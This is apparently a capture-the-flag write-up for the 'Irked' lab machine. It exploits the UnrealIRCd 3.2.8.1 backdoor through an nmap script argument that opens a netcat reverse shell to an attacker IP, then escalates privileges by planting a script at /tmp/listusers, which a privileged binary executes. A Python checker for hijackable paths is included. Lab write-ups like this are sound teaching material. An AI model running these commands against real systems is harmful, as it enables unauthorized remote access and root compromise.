Irked
UnrealIRCd Backdoor exploitation - Custom binary manipulation PrivEsc
Scanning
Starting off with the nmap scan

Enumeration

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.117

Ports 22 (OpenSSH 6.7p1) and 111 (rpcbind 2-4) don't look promising.
Ports 6697, 8067 & 65534 are running UnrealIRCd. Version 3.2.8.1 of this service shipped with a backdoor (CVE-2010-2075): any line received that starts with "AB;" is handed to system() before the client has even registered, giving unauthenticated command execution as the user running the daemon. nmap's irc-unrealircd-backdoor script checks for it with a timing trick, asking the server to sleep and measuring how long it stays silent.

nmap -p 6697,8067,65534 --script irc-unrealircd-backdoor 10.10.10.117

Port 8067 is vulnerable!
Initial Foothold
nmap -p 8067 --script=irc-unrealircd-backdoor --script-args=irc-unrealircd-backdoor.command="nc -e /bin/bash 10.10.14.6 4444" 10.10.10.117
With a netcat listener waiting on port 4444 we get a reverse shell. The command runs blind on the server (nothing it prints comes back over the IRC socket), which is why a reverse shell rather than a plain command is used here.

Privilege Escalation

Running the custom binary gives us an error message: it tries to execute /tmp/listusers, which does not exist.

Because the binary runs with elevated privileges and calls a fixed path inside the world-writable /tmp, we control what it executes. Drop a script there that spawns a shell, make it executable (system() goes through /bin/sh, which needs the execute bit), and run the binary again:
echo "bash" > /tmp/listusers
chmod +x /tmp/listusers

One caveat worth keeping in mind for this class of bug: if a program only raises its effective uid rather than calling setuid(0), bash drops the privilege again at startup unless it is invoked with -p.
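A quick way to triage every path a privileged binary calls, as an added example that is neither the writeup's code nor the box's binary: given paths you have already pulled from the binary (for instance with strings or ltrace), it says, from the point of view of the current low-privileged user, whether each one can be created, overwritten or replaced. The demo layout it builds in a temporary directory is constructed for illustration.

```python
#!/usr/bin/env python3
"""Which of the paths a privileged binary executes can we hijack?

Added example for this writeup, not the box's binary or the page's code.
The pattern behind the privesc is a root-running program calling a fixed
path (here /tmp/listusers) in a directory anyone can write to. Run this as
the unprivileged user; os.access() answers "yes" to everything for root.
"""
import os
import shutil
import stat
import sys
import tempfile
from typing import Optional

RUNNING_AS_ROOT = os.geteuid() == 0


def _writable_dir(d: str) -> bool:
    return os.path.isdir(d) and os.access(d, os.W_OK | os.X_OK)


def hijack_reason(path: str) -> Optional[str]:
    """Return why `path` can be hijacked by the current user, or None.

    Three cases matter for a system("/abs/path") call:
      1. the target is missing and we can create it (the nearest existing
         ancestor directory is writable), exactly the /tmp/listusers case;
      2. the target exists and we can write to it;
      3. the target exists and we can replace it: its directory is writable
         and either has no sticky bit or the file is ours.
    """
    path = os.path.abspath(path)
    if not os.path.lexists(path):
        d = os.path.dirname(path)
        while not os.path.exists(d):          # mkdir -p up to the first existing ancestor
            d = os.path.dirname(d)
        return f"missing; can be created because {d} is writable" if _writable_dir(d) else None
    if os.access(path, os.W_OK):
        return "exists and is writable"
    parent = os.path.dirname(path)
    if _writable_dir(parent):
        sticky = os.stat(parent).st_mode & stat.S_ISVTX
        if not sticky or os.lstat(path).st_uid == os.geteuid():
            return f"exists; can be replaced because {parent} is writable"
    return None


def hijackable(paths) -> dict:
    """Map each path to its reason, keeping only the hijackable ones."""
    out = {}
    for p in paths:
        reason = hijack_reason(p)
        if reason:
            out[p] = reason
    return out


def demo_layout() -> dict:
    """Constructed layout (not the box): a /tmp-like sticky world-writable dir
    with a missing target and one we own, plus a read-only dir with a tool."""
    base = tempfile.mkdtemp(prefix="hijack-demo-")
    tmp_like = os.path.join(base, "tmp")
    os.mkdir(tmp_like)
    os.chmod(tmp_like, 0o1777)
    owned = os.path.join(tmp_like, "owned")
    with open(owned, "w") as f:
        f.write("bash\n")
    ro_dir = os.path.join(base, "bin")
    os.mkdir(ro_dir)
    tool = os.path.join(ro_dir, "tool")
    with open(tool, "w") as f:
        f.write("#!/bin/sh\n")
    os.chmod(tool, 0o555)
    os.chmod(ro_dir, 0o555)
    try:
        return {
            "missing": hijack_reason(os.path.join(tmp_like, "listusers")),
            "owned": hijack_reason(owned),
            "readonly": hijack_reason(tool),
        }
    finally:
        os.chmod(ro_dir, 0o755)               # so rmtree can unlink the tool
        shutil.rmtree(base)


if __name__ == "__main__":
    targets = sys.argv[1:] or ["/tmp/listusers"]
    for p, why in hijackable(targets).items():
        print(f"{p}: {why}")
```

The sticky-bit rule is the detail people miss: /tmp's sticky bit stops you from deleting or renaming someone else's file, but it does nothing against creating a file that is not there yet, which is all the binary on this box requires.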
